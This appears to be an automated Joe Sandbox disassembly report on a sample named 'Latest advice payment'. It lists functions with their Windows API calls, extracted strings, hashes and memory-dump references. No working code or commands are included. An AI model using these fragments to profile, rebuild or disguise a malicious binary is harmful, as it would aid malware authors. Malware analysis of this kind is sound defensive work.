                                                            • Opcode ID: 3ab8a842d32572b350a9190007a4a127624ce99d45a63613ce92a90644a653a0
                                                            • Instruction ID: 4a07c4b4066c1b2df47e6fc77d241fc69a3420cfa6f8bbb4b6bcd484027a6768
                                                            • Opcode Fuzzy Hash: 3ab8a842d32572b350a9190007a4a127624ce99d45a63613ce92a90644a653a0
                                                            • Instruction Fuzzy Hash: B821597251024AAFDF08DFA9CC45AFA7BB8FB18354F104629F996D3250E735E850DB60
                                                            Function 005E6920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 005E69A2
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005E69B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 70fd902d10107d50835e92fd068ab31a1198a9cd4dec0d7386c5a4bb2347d606
                                                            • Instruction ID: 37b703bcaceec48214d96ddaaf6b395749f7d46400860655dabaa007461cee2b
                                                            • Opcode Fuzzy Hash: 70fd902d10107d50835e92fd068ab31a1198a9cd4dec0d7386c5a4bb2347d606
                                                            • Instruction Fuzzy Hash: 85119A71100288ABEB188F659C84AAB3AA9FB253F4F104724F9E1D71E1CB31DC90A760
                                                            Function 005C29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 005C2A22
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005C2A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: f0d03004115ebcf50bc97a6d344eb7dabe896e335df8a71d2886ef83ddaa59ce
                                                            • Instruction ID: 8968b7458638561d6d79b8a550deed87bef8fc5d41ac9c25fdb5e8732fb3a688
                                                            • Opcode Fuzzy Hash: f0d03004115ebcf50bc97a6d344eb7dabe896e335df8a71d2886ef83ddaa59ce
                                                            • Instruction Fuzzy Hash: 01119032901528AFDB34DAD8DC44FAA7BA9BB45310F14403DE856E7290DBB0AD0AC791
                                                            Function 005D21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005D222C
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 005D2255
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: ad3ac418851c089fde10219a5bfcb9614556498e7d6f75e245423230b806c736
                                                            • Instruction ID: bf69340ab6d6c42d4d6d825f2ef021dee9adb35dc130ed7a16221068347e1295
                                                            • Opcode Fuzzy Hash: ad3ac418851c089fde10219a5bfcb9614556498e7d6f75e245423230b806c736
                                                            • Instruction Fuzzy Hash: A011EC74501265BEDB398F598C88EBBFFA8FF26351F10862BF90586200D2706984DAF0
                                                            Function 0057092D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00563C14,006252F8,?,?,?), ref: 0057096E
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • _wcscat.LIBCMT ref: 005A4CB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_memmove_wcscat
                                                            • String ID: Sb
                                                            • API String ID: 257928180-3592133247
                                                            • Opcode ID: aa604db13a5377a83509877bc0fcb10ba5dc46f3ecb2eb31b6281d3d9151bfa4
                                                            • Instruction ID: 7846808963953676be791ea2425e1bc4d9859afa5b92bc394d4544fefaf7e072
                                                            • Opcode Fuzzy Hash: aa604db13a5377a83509877bc0fcb10ba5dc46f3ecb2eb31b6281d3d9151bfa4
                                                            • Instruction Fuzzy Hash: 2511A93090561A9A8B50FB74E809EDD7FF9BF48360B0095A5BA49D71D1FA7096845B10
                                                            Function 005B8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005B8E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: af70d0a160ce864efe1633190ff3e57b273c418f80a3c69b97b11c347a313213
                                                            • Instruction ID: f41615ae310065eba01f0a5af808c1396df028a4be833537912b2f953cda6644
                                                            • Opcode Fuzzy Hash: af70d0a160ce864efe1633190ff3e57b273c418f80a3c69b97b11c347a313213
                                                            • Instruction Fuzzy Hash: 4701247164122AABCB14EBA4CC898FE7B7DFF45320B040A19F871572E1EE31A808C660
                                                            Function 005C8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: 623e1639efdfbfa87a2504b7b3db5253c9093d21576c8889be5ed3872338a77d
                                                            • Instruction ID: 5c0fcbf32473bc20b29613c60f1bbda4fe57386c4a05661c1138a1ba237836bc
                                                            • Opcode Fuzzy Hash: 623e1639efdfbfa87a2504b7b3db5253c9093d21576c8889be5ed3872338a77d
                                                            • Instruction Fuzzy Hash: AA01F971C042187EDB68DAA8C81AEFE7FF8DB11301F00459EF553D2181E874A6088760
                                                            Function 005B8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 005B8D6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 2facd5bc1a851229c69b82ccea4c86629c7692b81ee51509c9a11cd616316409
                                                            • Instruction ID: 03c09c61fcf88d5d18a5b8407f4e0b3f4b981f2a9f5af27209899b8fc5189fbd
                                                            • Opcode Fuzzy Hash: 2facd5bc1a851229c69b82ccea4c86629c7692b81ee51509c9a11cd616316409
                                                            • Instruction Fuzzy Hash: D901F771B4110AABCB15EBA0C99AEFE7BBCEF55300F14042AB801672D1DE206E08D6B1
                                                            Function 005B8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                              • Part of subcall function 005BAA99: GetClassNameW.USER32(?,?,000000FF), ref: 005BAABC
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 005B8DEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 266a7d63a18979ae62b5b580b18b8037f1e62e1598fee00562d161f088e38caa
                                                            • Instruction ID: eb6454fc98de94d58912a7b7d9ed894b84b69cdc92332895d9feb75de912ac53
                                                            • Opcode Fuzzy Hash: 266a7d63a18979ae62b5b580b18b8037f1e62e1598fee00562d161f088e38caa
                                                            • Instruction Fuzzy Hash: 8A01DB71A4110ABBDF15E7A4C986EFE7BACEF25300F140416B845632D1DE215E08D671
                                                            Function 005BC4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 005BC534
                                                              • Part of subcall function 005BC816: _memmove.LIBCMT ref: 005BC860
                                                              • Part of subcall function 005BC816: VariantInit.OLEAUT32(00000000), ref: 005BC882
                                                              • Part of subcall function 005BC816: VariantCopy.OLEAUT32(00000000,?), ref: 005BC88C
                                                            • VariantClear.OLEAUT32(?), ref: 005BC556
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Variant$Init$ClearCopy_memmove
                                                            • String ID: d}a
                                                            • API String ID: 2932060187-280751259
                                                            • Opcode ID: 71a05344b0237d1f415be472adbbfb1b4feebba25794236aea5746ab8f4bb526
                                                            • Instruction ID: f11e3e7051111e6110044a33e1ba8ee360dc0e9d8ce681d4b3f8747b3852459e
                                                            • Opcode Fuzzy Hash: 71a05344b0237d1f415be472adbbfb1b4feebba25794236aea5746ab8f4bb526
                                                            • Instruction Fuzzy Hash: 221100719007099FC710DF99D8C48DAFBF8FF18310B50856EE58AD7651D771AA48CB90
                                                            Function 005C4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: f421950d56ea124cc50f16c3b94434ccdaf7b5e24af669979003f9dfd5775d9b
                                                            • Instruction ID: d929aecc96ea858b0e8542e0e653d47c2adc0ff98849c77bdf87078596b9d506
                                                            • Opcode Fuzzy Hash: f421950d56ea124cc50f16c3b94434ccdaf7b5e24af669979003f9dfd5775d9b
                                                            • Instruction Fuzzy Hash: 3EE092326002292AD720AA99AC49FE7FBACEB95B60F01016AFD04E7151D9709A458BE0
                                                            Function 0059B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0059B314: _memset.LIBCMT ref: 0059B321
                                                              • Part of subcall function 00580940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0059B2F0,?,?,?,0056100A), ref: 00580945
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0056100A), ref: 0059B2F4
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0056100A), ref: 0059B303
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0059B2FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: 61105e1e103d42183c5234b07d3300dd83cbd01f594c669df2dd288ea6fea650
                                                            • Instruction ID: f5c10d480316192386751bf20cc1c9b33c0b87360729b7eacf09ae1e47f3af58
                                                            • Opcode Fuzzy Hash: 61105e1e103d42183c5234b07d3300dd83cbd01f594c669df2dd288ea6fea650
                                                            • Instruction Fuzzy Hash: 3EE06D702007428BEB64DF28EA083437EE4BF44714F008D6CE496C7280EBB4D448CBA1
                                                            Function 005B7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005B7C82
                                                              • Part of subcall function 00583358: _doexit.LIBCMT ref: 00583362
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: 4dade29fb310fbdcf7045aee09975992ecfa2ffe49ab6e3ec05433a36b49ab45
                                                            • Instruction ID: 3d8ee78fa7ba0d490ac2d87d431b9088f7751031d8d8affebf72755952afc2a9
                                                            • Opcode Fuzzy Hash: 4dade29fb310fbdcf7045aee09975992ecfa2ffe49ab6e3ec05433a36b49ab45
                                                            • Instruction Fuzzy Hash: 2AD0C23238431832D20432A4AC0BBCA3E485B44B52F040415BF046A0D34DD1598042A8
                                                            Function 005A1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 005A1775
                                                              • Part of subcall function 005DBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,005A195E,?), ref: 005DBFFE
                                                              • Part of subcall function 005DBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 005DC010
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 005A196D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                            • String ID: WIN_XPe
                                                            • API String ID: 582185067-3257408948
                                                            • Opcode ID: 20a84b668591593131a206cf2251a3fb43889b0d176ba61e60f85a3eb286b876
                                                            • Instruction ID: f43789e302165d808dc88337f7cdf767705a03061a1140ceae97ad222a9909eb
                                                            • Opcode Fuzzy Hash: 20a84b668591593131a206cf2251a3fb43889b0d176ba61e60f85a3eb286b876
                                                            • Instruction Fuzzy Hash: FAF03970800009DFDB29DB94CA88AECBFF8FB18300F102496E042A6090CB304F88DF24
                                                            Function 005E5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005E596E
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005E5981
                                                              • Part of subcall function 005C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C52BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 48f7f7e8c40930caf0c398c72dc4a4e2612a61f944f71f82e5b58302ff496012
                                                            • Instruction ID: 7d815180261c0bf0618c20cb8f73fba1efa86051b38296d1576077660bc9337d
                                                            • Opcode Fuzzy Hash: 48f7f7e8c40930caf0c398c72dc4a4e2612a61f944f71f82e5b58302ff496012
                                                            • Instruction Fuzzy Hash: FAD0C7353843517BD6686B709C4FFD66A55FB50750F05042572459E1D0DDE05444C754
                                                            Function 005E5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005E59AE
                                                            • PostMessageW.USER32(00000000), ref: 005E59B5
                                                              • Part of subcall function 005C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005C52BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 0230f8acc1351303244608fb899cc23f0cbde34154c7f4d4b7a582c0d6c5463e
                                                            • Instruction ID: 7bb66b2e7cf840210c7e59d1b70f85a873c1b8d706ea4279b9bceb9382e7bdba
                                                            • Opcode Fuzzy Hash: 0230f8acc1351303244608fb899cc23f0cbde34154c7f4d4b7a582c0d6c5463e
                                                            • Instruction Fuzzy Hash: B0D0C9313803517BE6A8ABB09C8FFD66A65FBA4B50F050829B285AE1D0DDE0A844C754